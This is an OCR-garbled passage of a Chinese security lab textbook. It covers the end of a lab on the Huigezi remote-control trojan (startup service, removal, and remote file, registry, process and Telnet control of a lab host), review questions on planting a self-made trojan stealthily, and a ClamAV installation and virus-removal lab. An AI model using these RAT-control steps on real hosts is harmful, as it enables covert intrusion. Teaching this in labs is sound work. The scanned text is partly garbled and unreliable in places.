“IceSword exe 1548 C:\Documents and Settings MAdninistrator RENT. 8 Ox8221F6AD 
Erry. EXE 1592 C:\WINDOWS\System32\TDIFW. EXE 8 OxB1CBEDSS 
e A VEOXTRAT. EXE 1696 C: WINDONSVSysten32 WBoxTr ay. exe 8 Ox820DFT20 
启动 姐 PP ctemow. exe 1752 C:\WINDOWS\System32\CTFMON. EXE 8 0x821102D0 
回 sauwwc ExE 1768 C:\Program Files\Microsoft SQL Server\80\Tools\, 8 0x82302380 
{= 回 rumsw exe 1808 C: \WINDOWS\Systen32\TLNTSVR. EXE 8 Ox81C87940 
回 wsszAgcr EXE 1864 C:\Program Files\Common Files\System\MSSearch\B 8 OxSICTETFO 
服务 回 svcmsr exe 1972 _C:\WINDORS\Systen32\SVCHOST. EXE 8 OxSIC2DCFO 
Ie LORE, EXE Y XE ] 
注册 表 | | 回 wTPRVSE exe 3532 C: \WINDOWS\Systen32\WBEN\WHIPRVSE. EXE 8 Ox8221C970 
文件 1 | » 


图 17.6 查看 灰 鸟 子 启 动 进程 


3. 查看 服务 
进入 控制 面板 的 “服务 ”, 增 加 了 一 个 名 为 huigezi 的 服务 ,该 服务 为 启动 计算 机 时 灰 铝 
子 的 启动 程序 ,如 图 17.7 所 示 。 


zix 
常规 jar | 恢复 | 依存 关系 | 

服务 名 称 。 ”实验 测试 程序 

saam. WEE 


iR. iris EM 


可 执行 文件 的 路 径 QD : 
E: WINDOWS Vui geri. exe 


启动 类 型 证): [B3 z| 


服务 状态 : 已 停止 


启动 | SET | Heo) RER | 


当 从 此 处 启动 服务 时 ， 您 可 指定 所 适用 的 启动 参数 。 


ewssw: | 


取消 应 用 OD 
图 17.7 查看 灰 铝 子 的 启动 程序 


17.5.4 HIRAK T- 


首先 ,停止 当前 运行 的 IEXPLORE 程序 ,并 停止 huigezi 服务 ,将 Windows 目录 下 的 
huigezi. exe 文件 删除 ,重新 启动 计算 机 即 可 御 载 灰 馈 子 程序 。 
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17.5.5 木马 功能 验证 


1. 文件 管理 

(1) 主机 B 在 目录 D:\Work\Trojan\ 下 建立 一 个 文本 文件 ,并 命名 为 Test. txt。 

(2) 主机 A 操作 * 灰 合子 远程 控制 ?程序 来 对 主机 B 进行 文件 管理 。 

单 击 “ 文 件 管理 器 ”属性 页 ,效仿 资源 管理 器 的 方法 在 左 侧 的 树 形 列表 的 “自动 上 线 主 
机 ”下 找到 主机 B 新 建 的 文件 D:\Work\Trojan\Test. txt。 在 右 侧 的 详细 列表 中 对 该 文件 
进行 重 命名 操作 。 

(3) 在 主机 B 上 观察 文件 操作 的 结果 。 

2. 系统 信息 查看 

主机 A 操作 * 灰 鲁 子 远程 控制 ?程序 查看 主机 B 的 操作 系统 信息 。 单 击 “ 远 程控 制 命 
令 ” 属 性 页 ,选中 “系统 操作 ”属性 页 , 单 击 界面 右 侧 的 “系统 信息 ”按钮 ,查看 主机 B 操作 系 
BR. 

3. 进程 查看 

(1) 主机 A 操作 * 灰 鸽子 远程 控制 ?程序 对 主机 也 启动 的 进程 进行 查看 。 

单 击 “ 远 程控 制 命令 ”属性 页 ,选中 “进程 管理 ”属性 页 , 单 击 界面 右 侧 的 “查看 进程 ” 按 
钮 ,查看 主机 B 进程 信息 。 

(2) 主机 B 查看 “进程 监控 ”一 “进程 视图 ”, 枚 举 出 当前 系统 运行 的 进程 ,并 和 主机 A 
的 查看 结果 相 比 较 。 

4. 注册 表 管 理 

主机 A 单 击 “ 注 册 表 编辑 器 ”属性 页 ,在 左 侧 树 状 控件 中 “远程 主机 ”( 主 机 B) 注 册 表 的 
HKEY_LOCAL_MACHINE\Software\ 下 ,创建 新 的 注册 表 项 ;对 新 创建 的 注册 表 项 进行 
重 命名 等 修改 操作 ;删除 新 创建 的 注册 表 项 ,主机 B 查看 相应 注册 表 项 。 

5. Telnet 

主机 A 操作 * 灰 合子 远程 控制 ?程序 对 主机 B 进行 远程 控制 操作 , 单 击 菜单 项 中 的 
Telnet 按钮 ,打开 Telnet 窗口 ,使 用 cd c:\ 命 令 进行 目录 切换 ,使 用 dir 命令 显示 当前 目录 
内 容 , 使 用 其 他 命令 进行 远程 控制 。 

6. 其 他 命令 及 控制 

主机 A 通过 使 用 “ 灰 蚀 子 远程 控制 "程序 的 其 他 功能 (如 “捕获 屏幕 ”) ,对 主机 B 进行 
控制 。 


17.6 思考 问题 


1. 如 何 将 自己 制作 的 木马 种 植 到 目标 主机 上 ? 
2. 简单 分 析 该 方法 的 隐蔽 性 和 可 用 性。 
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18.1 实验 目的 与 要 求 


。 掌握 clamAV 安装 方法 。 
* 了 解 clamAV 基本 操作 。 


18.2 实验 环境 


在 VMWare 虚拟 机 中 安装 Linux 操作 系统 ,在 交换 网 络 结构 下 ,每 组 1 人 ,使 用 
clamA V 相关 软件 。 


18.3 背景 知识 


18.3.1 计算 机 病毒 的 基本 原理 


计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 “破坏 计算 机 功能 或 者 毁坏 数据 ,影响 
计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 本 词 条 为 消 歧义 词 条 。 常 说 
的 病毒 有 两 种 ,本 词 条 介绍 的 是 计算 机 病毒 ,要 了 解 生物 方面 的 病毒 ,请 参看 男 一 词 条 “ 病 
毒 *"。 编 制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 
够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ,被 称 为 计算 机 病毒 (compnuter virus)。 具 有 非 
授权 可 执行 性 、 隐 项 性 、 破 坏 性 、 传 染 性 .可 触发 性 。 
计算 机 病毒 的 传播 方式 主要 包括 以 下 几 种 。 

CD 存储 介质 。 包 括 软 盘 、 硬 盘 、 磁 带 、 移 动 U 盘 和 光盘 等 。 在 这 些 存储 设备 中 ,尤其 
以 软盘 和 移动 U 盘 是 使 用 最 广泛 的 移动 设备 ,也 是 病毒 传染 的 主要 途径 之 一 。 

(2) 网 络 。 随 着 Internet 技术 的 迅猛 发 展 ,Internet 在 给 人 们 的 工作 和 生活 带 来 极 大 方 
便 的 同时 ,也 成 为 病毒 滋生 与 传播 的 温床 , 当 人 们 从 Internet 下 载 或 浏览 各 种 资料 的 同时 ， 
病毒 可 能 也 就 伴随 这 些 有 用 的 资料 侵入 用 户 的 计算 机 系统 。 

(3) 电子 邮件 。 当 电子 邮件 (E-mail) 成 为 人 们 日 常生 活 和 工作 的 重要 工具 后 ,电子 邮 
件 病毒 无 疑 是 病毒 传播 的 最 佳 方式 , 近 几 年 出 现 的 危害 性 比较 大 的 病毒 几乎 全 是 通过 电子 
邮件 方式 传播 。 

计算 机 病毒 类 型 : 

1. 系统 病毒 

系统 病毒 的 前 级 为 Win32, PE, Win95, W32, W95 等 。 这 些 病 毒 的 一 般 公 有 特性 是 可 
以 感染 Windows 操作 系统 的 *. exe 和 » . dll 文件 ,并 通过 这 些 文件 进行 传播 ,如 CIH 
病毒 。 
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2. 蠕虫 病毒 

蠕虫 病毒 的 前 级 是 Worm。 这 种 病毒 的 公有 特性 是 通过 网 络 或 者 系统 漏洞 进行 传播 ， 
大 部 分 的 蠕虫 病毒 都 有 向 外 发 送 带 毒 邮件 .阻塞 网 络 的 特性 ,如 冲击 波 ( 阻 塞 网 络 )、 小 邮差 
(发 带 毒 邮件 ) 等 。 

3. 木马 病毒 .黑客 病毒 

木马 病毒 的 前 缀 是 Trojan。 黑 客 病毒 前 级 名 一 般 为 Hack。 木 马 病毒 的 公有 特性 是 通 
过 网 络 或 者 系统 漏洞 进入 用 户 的 系统 并 隐藏 ,然后 向 外 界 泄露 用 户 的 信息 ,而 黑客 病毒 则 有 
一 个 可 视 的 界面 ,能 对 用 户 的 计算 机 进行 远程 控制 。 木 马 、 黑 客 病毒 往往 是 成 对 出 现 的 , 即 
木马 病毒 负责 侵入 用 户 的 计算 机 ,而 黑客 病毒 则 会 通过 该 木马 病毒 来 进行 控制 。 现 在 这 两 
种 类 型 都 越 来 越 趋向 于 整合 了 。 一 般 的 木马 如 QQ 消息 尾巴 木马 Trojan. QQ3344, 还 有 大 
家 可 能 遇见 比较 多 的 针对 网 络 游戏 的 木马 病毒 ,如 Trojan. LMir. PSW. 60。 这 里 补充 一 点 ， 
病毒 名 中 有 PSW 或 者 PWD 之 类 的 一 般 都 表示 这 个 病毒 有 盗 取 密码 的 功能 (这 些 字 母 一 般 
都 为 “密码 ”的 英文 password 的 缩写 ) ,一 些 黑客 程序 如 网 络 泉 雄 (Hack. Nether. Client) 等 。 

4. 脚本 病毒 

脚本 病毒 的 前 级 是 Script。 脚 本 病毒 的 公有 特性 是 使 用 脚本 语言 编写 ,通过 网 页 进行 
传播 的 病毒 ,如 红色 代码 (Script. Redlof) 。 脚 本 病毒 还 会 有 VBS、JS( 表 明 是 何 种 脚本 编写 
的 ) 前 级 ,如 欢乐 时 光 (VBS. happytime) ,十 四 日 (JS. Fortnight. c. s) 等 。 

5. 宏 病毒 

宏 病 毒 是 也 是 脚本 病毒 的 一 种 ,由 于 它 的 特殊 性 ,因此 在 这 里 单独 算 成 一 类 。 宏 病毒 的 
前 级 是 Macro ,第 二 前 缀 是 Word、Word97、Excel、Excel97( 也 许 还 有 别 的 ) 其 中 之 一 。 凡 是 
只 感染 Word 97 及 以 前 版 本 Wrod 文档 的 病毒 采用 Word97 作为 第 二 前 级 ,格式 是 Macro. 
Word97; 凡 是 只 感染 Word 97 以 后 版 本 Word 文档 的 病毒 采用 Word 作为 第 二 前 级 ,格式 
是 Macro. Word; 凡 是 只 感染 Excel 97 及 以 前 版 本 Excel 文档 的 病毒 采用 Excel 97 作为 第 
二 前 级 ,格式 是 Macro. Excel97; 凡是 只 感染 Excel 97 以 后 版 本 Excel 文档 的 病毒 采用 
Excel 作为 第 二 前 级 ,格式 是 Macro. Excel, 依 此 类 推 。 该 类 病毒 的 公有 特性 是 能 感染 
Office 系列 文档 ,然后 通过 Office 通用 模板 进行 传播 ,如 著名 的 美丽 莎 (Macro. Melissa) 。 

6. 后 门 病毒 

后 门 病毒 的 前 级 是 Backdoor。 该 类 病毒 的 公有 特性 是 通过 网 络 传播 ,给 系统 开 后 门 ， 
给 用 户 计算 机 带 来 安全 隐患 。 如 很 多 朋友 遇 到 过 的 IRC 后 门 Backdoor. IRCBot. 

7. 病毒 种 植 程序 病毒 

这 类 病毒 的 公有 特性 是 运行 时 会 从 体内 释放 出 一 个 或 几 个 新 的 病毒 到 系统 目录 下 ,由 
释放 出 来 的 新 病毒 产生 破坏 ,如 冰河 播种 者 (Dropper. BingHe2. 2C) MSN 射手 (Dropper. 
Worm. Smibag) 等 。 

8. 破坏 性 程序 病毒 

破坏 性 程序 病毒 的 前 缀 是 Harm。 这 类 病毒 的 公有 特性 是 本 身 具有 好 看 的 图 标 来 诱惑 
用 户 点 击 , 当 用 户 点 击 这 类 病毒 时 ,病毒 便 会 直接 对 用 户 计算 机 产生 破坏 ,如 格式 化 C 盘 


(Harm. formatC. f) 杀手 命令 (Harm. Command. Killer) 等 。 
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9. 玩笑 病毒 

玩笑 病毒 的 前 级 是 Joke, 也 称 为 恶作剧 病毒 。 这 类 病毒 的 公有 特性 是 本 身 具有 好 看 的 
图 标 来 诱惑 用 户 点 击 , 当 用 户 点 击 这 类 病毒 时 ,病毒 会 做 出 各 种 破坏 操作 来 吓 距 用 户 , 其 实 
病毒 并 没有 对 用 户 计算 机 进行 任何 破坏 ,如 女 鬼 (Joke. Girlghost) 病 毒 。 

10. 捆绑 机 病毒 

捆绑 机 病毒 的 前 级 是 Binder。 这 类 病毒 的 公有 特性 是 病毒 作者 会 使 用 特定 的 捆绑 程序 
将 病毒 与 一 些 应 用 程序 如 QQ IE 捆绑 起 来 ,表面 上 看 是 一 个 正常 的 文件 , 当 用 户 运 行 这 些 
捆绑 病毒 时 ,会 表面 上 运行 这 些 应 用 程序 ,然后 隐藏 运行 捆绑 在 一 起 的 病毒 .从 而 给 用 户 造 
成 危害 ,如 捆绑 QQ(Binder. QQPass. QQBin) .系统 杀手 (Binder. killsys) 等 。 


18.3.2 clamAV 介绍 


clamA V 是 免费 而 且 开 放 源 代码 的 防毒 软件 ,软件 与 病毒 码 的 更 新 缘由 社 群 免费 发 布 。 
目前 clamAV 主要 是 使 用 在 由 Linux, FreeBSD 等 UNIX-like 系统 架设 的 邮件 服务 器 上 , 提 
供电 子 邮 件 的 病毒 扫描 服务 。clamAV 本 身 是 在 文字 接口 下 运作 ,但 也 有 许多 图 形 接口 的 
前 端 工具 (GUI frontrend) 可 用 ,另外 由 于 其 开放 源 代码 的 特性 ,在 Windows 5j Mac OS X 
平台 都 有 其 移植 版 。 其 主要 特征 如 下 。 

(1) 命令 行 扫描 程序 。 

(2) 快速 ,支持 按 访问 扫描 的 多 线程 监控 程序 。 

(3) 支持 Sendmail 的 milter 接口 。 

(4) 支持 脚本 更 新 和 数字 特征 库 的 高 级 数据 库 更 新 程序 。 

(5) 支持 病毒 扫描 程序 C 语言 库 。 

(6) 支持 访问 扫描 (Linux 和 freeBSD) 。 

(7) 每 天 多 次 更 新 病毒 库 。 

(8) 内 置 了 对 包含 zip rar,tar,gzip,bzip2,ole2,cabinet chm, binhex, sis 及 其 他 格式 在 
内 的 多 种 压缩 包 模 式 支持 。 

(9) 内 置 了 对 绝 大 多 数 邮件 文件 格式 的 支持 。 

(10) 内 置 了 对 使 用 upx、fsg、petite、nspack、wwpack32、mew、upack 压缩 以 及 用 sue, 
y0da cryptor 和 其 他 程序 模糊 处 理 的 elf 可 执行 文件 和 便携 式 可 执行 文件 的 支持 。 

(QD 内 置 了 对 包括 MS Office 和 MACOffice 文件 ,HTML、RTF 和 PDF 在 内 的 主流 
文档 格式 的 支持 。 

在 http: //jaist. dl. sourceforge. net/sourceforge/clamav/clamav-0. 95. 1. tar. gz 处 可 下 
载 得 到 安装 包 ( 网 上 也 有 很 多 更 新 的 安装 包 , 可 自行 更 新 下 载 ) 。 


18.4 实验 内 容 


在 Linux 环境 下 安装 clamAV ,并 使 用 clamA V 进行 病毒 查 杀 。 
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18.5 实验 步骤 


18.5.1 安装 步 又 


(1) 在 root 目录 下 ,新 建 自己 的 工作 目录 mytest, 然 后 将 该 目录 下 的 clamav-0. 95. 1. 
tar. gz 进行 解压 ,如 图 18. 1 所 示 。 


[root@liang ~]# mkdir mytest 
[root@liang ~J# Is 
anaconda-ks.cfg install.log install.log.syslog mytest 


[root@liang ~]# cd mytest 
[root@liang mutest]# Is 

-1.tar.gz 

mytest]# tar zxvf clamav-@.95.1.tar.gz_ 


图 18.1  clamAV fit F 


(2) 如 果 系统 中 没有 C 编译 器 将 报错 ,可 安装 GCC 编译 器 ,如 图 18. 2 所 示 。 


[rootBliang mytest]# 
[rootB@liang mytest]# 

[root@liang mytest]# yum install gcc 

base 1.1 kB 88:88 
primary xml .gz 878 kB 88:84 
base ORI EELEEETEEELEEETEEEEEEEEEEEEEEETEEEEEEEEEEEEEEE E E 2580/2588 
updates 188: 951 B 68:88 
primary.xml. : 152 kB — 88:12 


安装 GCC 编译 器 


(3) 如 果 系 统 中 没有 zlib-devel 库 ,会 报错 ,安装 方法 如 图 18. 3 所 示 。 


[root@liang mytest]# 
[root@liang mytest]# yum install zlib-devel 

Setting up Install Process 

Parsing package install arguments 

Resolving Dependencies 

--> Running transaction check 

---> Package zlib-devel i386 @:1.2.3-3 set to be updated 
--> Finished Dependency Resolution 


图 18.3 安装 zlib-devel Jf 


(4) 添加 一 个 clamAV 用 户 ,如 图 18.4 所 示 。 


Croot@liang mytestJ# 
[root@liang mytest]# 
[root@liang mytest]# useradd clamav, 


图 18.4 添加 一 个 clamAV HP 


(5) 此 时 可 以 进入 解压 后 的 文件 夹 clamav-0. 95. 1 进行 编译 ,. /configure 如 图 18. 5 


所 示 。 


COPYING. Izma ESER test 
COPYING.regex libclamav.pc.in unit test 
COPYING.sha256 libclamunrar UPGRADE 
[root@liang clamav-8.95.1]# ./conf igure 
checking build system type... i686-pc-linux-gnu 


checking host system type... i686-pc-linux-gnu 
checking target system type... i686-pc-linux-gnu 
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(6) 执行 make 和 make install, 如 图 18. 6 所 示 。 


[root@liang clamav-8 95 118 
[root@liang clamav 


[Iroot8liang clamay-@.95.1]8 
[root@liang clamay-@.95.11# 
Croot@liang clamav-@.95.1]# make install | 


图 18.6 编译 安装 clamAV 


(7) 此 时 已 完成 配置 ,在 /usr/local/bin 下 为 所 要 执行 的 程序 ,如 图 18. 7 所 示 。 


[root@liang log]# 
[root@liang loglt cd /usr/local/bin 
Crooteliang bin]# Is 


clamav-config clamconf clamdscan clamscan freshclam sigtool 


Croot@liang bin]# _ 


图 18.7 生成 clamAV 


(8) 执行 扫描 程序 ,如 图 18. 8 所 示 。 


clamav-config clamconf clamdscan clamscan freshclam sigtool 


[rooteliang bin]# clamscan 


LibClamAU Warming: dtn —————^A——« ^E 


LibClamhU Warning: www The virus database is older than 7 dayg! 


LibClamhU Warning: www“ Please update it as soon as possible. 


LibClamQU Warning: s»»oemooxsoen oti noH HO BOUM MENE NE MEDE DE MIEN I IE Be aED IE IEE EE E 


/usr/local/bin/clamconf : 
zusr/local/bin/freshc lam: 
/usr7local^bin/clamscan: 
/usr/local/bin/sigtool: 
/usr/local/bin/clamdscan: OK 
/usr/local/bin/clamav-conf ig: OK 


------ SCAN SUMMARY 
Known viruses: 538745 
Engine version: 8.95.1 
Scanned directo d 
Scanned files: 
Infected files: 8 
Data scanned: 8.93 MB 
Data read: 8.93 MB (ratio 1.88:1) 
Time: 2.864 sec (8 m 2 s) 
[root@liang bin]# _ 


图 18.8 执行 clamscan 扫描 程序 


18. 5.2 使 用 clam 进行 查 杀 


CD 启用 freshclam 来 进行 病毒 库 的 更 新 操作 ,修改 /usr/local 


件 ,将 Example 字段 前 加 # ,然后 回 到 /usr/local/bin 下 执行 ,如 


clamav-config clamconf clamdscan clamscan freshclam sigtool 
[root@liang bin]# freshclam 
ClamAV update process started at Wed Jun 18 16:58:44 2689 


WARNING: DNS record is older than 3 hours. 
WARNING: Invalid DNS reply. Falling back to HTTP mode. 


18.9 


freshclam. conf X 
所 示 


Reading CUD header (main.cvd): Trying host database.clamav.net (203.178.137.175) 


ok 

Downloading main-51.cdiff [188%] 

main.cld updated (version: 51, sigs: 545835, f-level: 42, builder: 
Reading CUD header (daily.cvd): OK 


sven) 


WARNING: getfile: daily-9214.cdiff not found on remote server (IP: 283.178.137.1 


?5) 


WARNING: getpatch: Can't download daily-9214.cdiff from database .clamav.net 


Trying host database.clamav.net (219.94.128.99)... 


WARNING: getfile: daily-9214.cdiff not found on remote server (IP: 219.94.128.99 


) 
WARNING: getpatch: Can't download daily-9214.cdiff from database.clamav.net 
Trying host database.clamav.net (219.186.242.51)... 
WARNING: getfile: daily-9214.cdiff not found on remote server (IP: 219.186.242.5 
D 
WARNING: getpatch: Can’t download daily-9214.cdiff from database .clamav.net 
WARNING: Incremental update failed, trying to download daily.cvd 

Truing host database.clamav.net (218.44.253.75).. 


图 18.9 使 用 freshclam 更 新 病毒 库 


前 目录 再 进行 扫描 ,使 用 参 
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(2) 此 时 操作 clamscan 不 再 会 有 病毒 库 过 期 提示 ,如 图 18. 10 所 示 。 


[root@liang bin]# clamscan 
vusr/local/bin/clamconf: OK 
vusr/localvbin/freshclam: OK 
usr/local/bin/clamscan: OK 
vusr/local/bin/sigtool: 
vusr/local/bin/clamdscan: OK 
zusr/local/bin/clamav-conf ig 


ae -- SCAN SUMMARY -- 
Known viruses: 572638 

Engine version: 8.95.1 

Scanned directories: 1 

Scanned files: 6 

Infected files: 8 

Data scanned: 8.93 MB 

Data read: 8.93 MB (ratio 1.88:1) 
Time: 2.419 sec (B m 2 s) 
[root@liang bin]# _ 


图 18.10 使 用 clamscan 查 杀 病毒 


原先 刚 开始 执行 时 有 过 期 提示 ,如 图 18. 11 所 示 


Croot@liang bin]# clamscan 

LibClamAU Warning: Esendere DEDEDE DEPED DEDE DEDEDE DE NEDE EEEE BE DE DE DE DEE DEDE DEDE DENE DEDEDE IEEE 
LibClamAU Warning: www The virus database is older than 7 day®! www 
LibClamhU Warning: *** Please update it as soon as possible. ~ ux 
ISP Er Hm "————————— 
/usr/local/bin/clamconf: OK 

usr/local/bin/f reshclam: OK 


图 18.11 clamscan 提示 


目录 下 放 人 病毒 文件 H_Client. exe. 其 为 木马 程序 ,然后 启用 clamscan 对 当 


数 对 病毒 进行 清除 , 即 clamscan --remove, 如 图 18. 12 所 示 。 


(3) 在 


S 


Croot@liang bin]# 

Croot@liang bin]# Is 

clamay-config clamconf clamdscan clamscan freshclam H_Client.exe sigtool 
Croot@liang bin]# clamscan --remove 
¢usr/local/bin/clamconf: OK 
vusr/localvbin/freshclam: OK 
/usr/local/bin/clamscan 

/usr/local/bin/sigtool: 
vusr/local/bin/H_Client.exe: Trojan.Dropper-1 FOUND 
vusr/local/bin/H_Client.exe: Removed. 
vusr/local/bin/clamdscan: OK 
vusr/local/bin/clamav-conf ig: OK 


-- - SCAN SUMMARY -- 
Known viruses: 572838 

Engine version: 8.95.1 

Scanned directories: 1 

Scanned files: 7 

Infected files: 1 

Data scanned: 1.85 MB 

Data read: 2.48 MB (ratio @.42:1) 
Time: 1.647 sec (8 m 1 s) 
[root@liang bin]# _ 


图 18.12 使 用 clamscan 清除 病毒 


查看 结果 ,已 经 清除 ,如 图 18. 13 所 示 ( 已 无 该 文件 ) 。 


[root@liang binl# 
Croot@liang binlt Is 


clamav-config clamconf clamdscan clamscan freshclam sigtool 
[root@liang bin]# _ 


图 18.13 clamscan 清除 病毒 结果 
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[S 


(4) 在 当前 目录 下 添加 一 个 vbs 的 脚本 病毒 , 通 


[rooteliang bin]# Is 
clamav-config clamconf clamdscan 
[roote@liang bin]# clamscan 
Zusr/local/bin/clamconf : OK 
/usr/local/bin/freshclam: OK 
/usr/local/bin/clamscan: OK 
/usr/local/bin/sigtool: OK 
vusr/local/bin/clamdscan: OK 
zusr/local/bin/clamav-conf ig: OK 
vusr/local/binss.vbs: Worm.UBS.Bingd FOUND 


clamscan 


- - SCAN SUMMARY - 
Known viruses: 572638 

Engine version: 8.95.1 

Scanned directories: 1 

Scanned files: 7 

Infected files: 1 

Data scanned: 8.93 MB 

Data read: 8.93 MB (ratio 1.88:1) 
Time: 1.146 sec (@ m 1 s) 
[root@liang bin]# _ 


图 18. 14 


(5) 使 用 clamav 进行 清除 扫描 ,如 图 18. 15 所 万 


[rooteliang bin]# Is 
clamav-config clamconf clamdscan 
Croot@liang bin]# clamscan --remove 
/usr/local/bin/clamconf : OK 
/usr/local/bin/freshclam: OK 
/usr/local/bin/clamscan: OK 
/usr/local/bin/sigtool: OK 
/usr/local/ /clamdscan: 
/usr/local/ 
usr/local/ 
/usr/local/ 


clamscan 


Worm.UBS .Bingd FOUND 
Removed . 


- - SCAN SUMMARY - 
Known viruses: 572838 

Engine version: 8.95.1 

Scanned directories: 1 

Scanned files: 7 

Infected files: 1 

Data scanned: 8.93 MB 

Data read: 8.93 MB (ratio 1.88:1) 
Time: 1.385 sec (B m 1 s) 
[root@liang bin]# Is 
clamay-config clamconf 
[root@liang bin]# _ 


clamdscan clamscan 


图 18. 15 


(6) 对 其 他 参数 可 以 通过 clamscan 


freshclam 


freshclam 


freshclam 


help 来 查看 ,图 18. 16 所 示 为 部 分 参数 


过 clamscan 扫描 ,如 图 18. 14 所 示 。 


sigtool ?3983333.vbs 


添加 vbs 的 脚本 病毒 


S 


sigtool 


sigtool 


使 用 clamav 进行 清除 扫描 


Ss 
ak 
Ss 


Clam AntiVirus Scanner 8.95.1 


By The ClamAV Team: http://uww.clamay. 
(C) 28827-2889 Sourcefire, Inc. 


Print th 
Print ve: 
Be verbo: 
Enable 1 
Only out: 
Write to 
Disable 
Only pri 
Sound be 


--help -h 
--version -u 
--verbose -v 
--debug 

--quiet 

--stdout 

--no-summary 

--infected 

--bell 


--tempd ir=DIRECTORY 
--leave-temps[=yes/no(*)] 
--database=FILE/DIR -à FILE/DIR 


net/team 


is help screen 
rsion number 

se 

ibclamav’s debug messages 
put error Jessages 

stdout instead of stderr 
summary at end of scanning 
nt infected files 

11 on virus detection 


Create temporary files in DIRECTORY 
Do not remove temporary files 
Load virus database from FILE or load 


all supported db files from DIR 


--log=F ILE 
--recursivel=yes/no(*)] 
es/no(x)] 
IRECTORY 
IRECTORY 


Save scal 
Scan sub 
Remove i 
Move inf 
Copu inf 


clamscan 帮 


图 18. 16 


n report to FILE 
directories recursively 

nfected files. Be carefult 
ected files into DIRECTORY 
ected files into DIRECTORY 


助 参 
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18.6 思考 问题 


1. 使 用 其 他 参数 进行 扫描 查 杀 ,或 者 设置 开机 运行 等 操作 。 
2. 阅读 源码 ,对 其 查 杀 功能 进行 改进 。 
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